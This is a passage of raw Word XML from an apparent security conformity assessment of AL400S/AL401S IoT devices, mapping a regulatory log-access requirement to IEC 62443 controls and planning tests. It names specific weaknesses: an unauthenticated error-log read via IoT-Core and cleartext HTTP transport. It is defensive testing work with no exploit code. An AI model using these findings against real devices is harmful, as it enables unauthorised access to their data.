            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="036E2F85"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1. Open the release-notes page for AL400S/AL401S.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3521AA61" w14:textId="77777777" w:rsidR="007B59CE" w:rsidRPr="006D5B99" w:rsidRDefault="007B59CE" w:rsidP="007B59C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 Check: does it contain serial-number/per-unit information? A timestamp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B59DE8" w14:textId="67921364" w:rsidR="007B59CE" w:rsidRPr="006D5B99" w:rsidRDefault="007B59CE" w:rsidP="007B59C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per upload? Tamper protection (signature/hash of the notes)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59CE" w:rsidRPr="006D5B99"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4C211FD2" w:rsidR="007B59CE" w:rsidRPr="006D5B99" w:rsidRDefault="007B59CE" w:rsidP="007B59CE">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="394DC9C5" w14:textId="1D3899E6" w:rsidR="007B59CE" w:rsidRPr="006D5B99" w:rsidRDefault="007B59CE" w:rsidP="007B59C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the release notes are product-wide (not per-unit), without cryptographic tamper protection, and without a guaranteed 5-year retention obligation per individual upload </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> cannot compensate for the on-device gap (confirms G-3).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F0A5519" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRPr="006D5B99" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FDF3B1" w14:textId="77777777" w:rsidR="00806D34" w:rsidRPr="006D5B99" w:rsidRDefault="00806D34" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02493C4D" w14:textId="716EC163" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B0FF7" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Critical Review &amp; Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E469F" w14:textId="71BFDF18" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-014</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6788117C" w14:textId="6285D0F7" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="00941153" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text: The system shall restrict access to the tracing log data exclusively to demonstrating conformity further to a reasoned request from a competent national authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13A613" w14:textId="4E143480" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR </w:t>
      </w:r>
      <w:r w:rsidR="001D4045" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F5731" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00806F98" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 1.1, CR 1.2, </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.1, CR 3.9, CR 4.1, CR 6.1</w:t>
      </w:r>
      <w:r w:rsidR="00806F98" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (inversion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED7138D" w14:textId="25EEDCE2" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I (tracing log to be access-restricted); </w:t>
      </w:r>
      <w:r w:rsidR="00AF67E3" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF67E3" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(IoT A</w:t>
      </w:r>
      <w:r w:rsidR="00075ED7" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ccess Channel</w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15CA3B" w14:textId="298DDF19" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00075ED7" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering,) </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information Disclosure (primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524445AB" w14:textId="77777777" w:rsidR="00A95EC4" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70899778" w14:textId="5CC7EB34"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Error log readable via IoT-Core:  No auth gate (SRIO-10662), stated as the deficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6984CC87" w14:textId="492646B7"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IoT-Core incoming HTTP, no HTTPS (SRIO-7903/7907).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A753A7" w14:textId="605D627E"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2 concurrent connections, incoming-only (SRIO-7909/7908).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514E7BF" w14:textId="5853F64C" w:rsidR="00FF66C8" w:rsidRPr="006D5B99" w:rsidRDefault="00FF66C8" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>No documented delete/erase command; Stated for completeness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FD498" w14:textId="77777777" w:rsidR="00626A9E" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83A97C" w14:textId="53898C0F"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G-1</w:t>
      </w:r>
      <w:r w:rsidR="003C7633" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00912080" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00912080" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">G-3:  No documented erase command </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> no data-lifecycle control</w:t>
      </w:r>
      <w:r w:rsidR="00626A9E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8A322" w14:textId="54DB38E0" w:rsidR="00552B4D" w:rsidRPr="006D5B99" w:rsidRDefault="00552B4D" w:rsidP="00552B4D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7174B797" w14:textId="77777777" w:rsidR="00552B4D" w:rsidRPr="006D5B99" w:rsidRDefault="00552B4D" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A271550" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156DF986" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DB820E" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7BC1AC" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F70BB71" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2946B4" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2917990C" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D933E3B" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB4122E" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A17F57C" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDBE27F" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAA4713" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1B7997" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F754E7" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14925252" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03703587" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D3E8327" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6373FEEE" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A365A27" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="006D5B99" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F44594" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E1694" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E981022"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Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAF9C33"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Proves</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E08450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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E4D7BDB" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99">
              <w:t>SVV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13C28702" w14:textId="79802E9B" w:rsidR="00900880" w:rsidRPr="006D5B99"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Unauthenticated read: from an arbitrary segment node, read the full error log via IoT-Core with no credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C21817" w14:textId="7B1CAF50" w:rsidR="00900880" w:rsidRPr="006D5B99"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G-1/G-2 (no auth, no purpose-limit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E2F03C7" w14:textId="77777777" w:rsidR="009C14C9"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NIST SP 800-115 §4.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39230552" w14:textId="717F1960" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99">
              <w:t xml:space="preserve">OWASP ISTG-DES-AUTHZ-001 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8FE1E6" w14:textId="09A25621"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w:t>
            </w:r>
            <w:r w:rsidR="00065348" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F47780E" w14:textId="4080C2EE" w:rsidR="00900880" w:rsidRPr="006D5B99"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Cleartext capture: passively capture the log; confirm plaintext + no TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43D57AE4" w14:textId="57A6718A" w:rsidR="00900880" w:rsidRPr="006D5B99"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Documents the confidentiality-in-transit observation (DiD; MR-restriction is the primary finding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="024C1597" w14:textId="77777777" w:rsidR="00682EC6"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NIST SP 800-115 §3.5; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34632F19" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="006D5B99"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ifm CM-005 (SSLscan, --show-certificate)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5440440F" w14:textId="77777777" w:rsidR="00747C6B" w:rsidRPr="006D5B99" w:rsidRDefault="00747C6B" w:rsidP="00747C6B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FD85371" w14:textId="63E27915" w:rsidR="00747C6B" w:rsidRPr="006D5B99" w:rsidRDefault="00747C6B" w:rsidP="00747C6B">
            <w:pPr>
              <w:jc w:val="right"/>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06155A" w14:textId="34C7CD5E" w:rsidR="00900880" w:rsidRPr="006D5B99"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r w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
